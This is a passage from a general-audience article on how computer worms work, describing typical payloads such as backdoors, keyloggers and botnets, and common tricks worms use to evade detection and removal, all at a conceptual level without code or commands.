The Making of Malware

Payloads
While a worm’s primary design is to spread, they also have a payload to deliver – the actions to perform on an infected system. As with infection mechanisms, payloads can be just as varied:
• Damage or delete system files
• Deface webpages
• Plant backdoors
• Install keyloggers
• Act as DDoS (Distributed Denial of Service) zombies
• Perform spam duties
• Send password files
• Transmit sensitive data

To name just a few. Today, a worm’s payload is increasingly about data acquisition rather than damage. And by acquisition we’re talking about sifting for credit card numbers, capturing passwords, key logging for bank accounts, transmitting private data, and control of remote systems. Nice stuff.

In fact backdoors created by worms are a major problem. Worms can login to an IRC server and sit in channels waiting for commands, which could be to perform any of the tasks listed above. Such machines are called ‘zombies’, and en masse ‘bot-nets’.

The victim machines are usually ‘mum and dad’ computers, belonging to users with little knowledge of threats from the Net. Bot-nets can be used to mass-mail spam or launch DDoS attacks against hosts, flooding a target address and knocking a machine or Website off the Net.

In January this year a 20-year-old from the United States was convicted of controlling and profiting from a network of some 500,000 zombie machines.

It probably didn’t help at all that he targeted the US Naval Warfare Center and Department of Defence!

Staying alive
Worm authors aren’t stupid (unfortunately) and many worms employ a variety of methods to avoid detection or prevent removal, including:
• Impersonating a legitimate program in the process list
• Hiding from the process list
• Hiding inside running applications
• Selectively spamming email addresses
• Looking for and disabling virus scanners
• Looking for and bypassing firewall software
• Hiding on hard drives as valid applications

Worms that mass-mail are smart enough to omit domains belonging to security firms and malware researchers and, in some cases, worms have been programmed to look for and disable security suites from the likes of Symantec, McAfee and Sophos – at least until the next update. Sometimes these packages become the target themselves as a means to enter a system – as Symantec was forced to address with its antivirus software earlier this year. So not even dedicated security software is safe.

And, of course, propagation is the ultimate in self-preservation.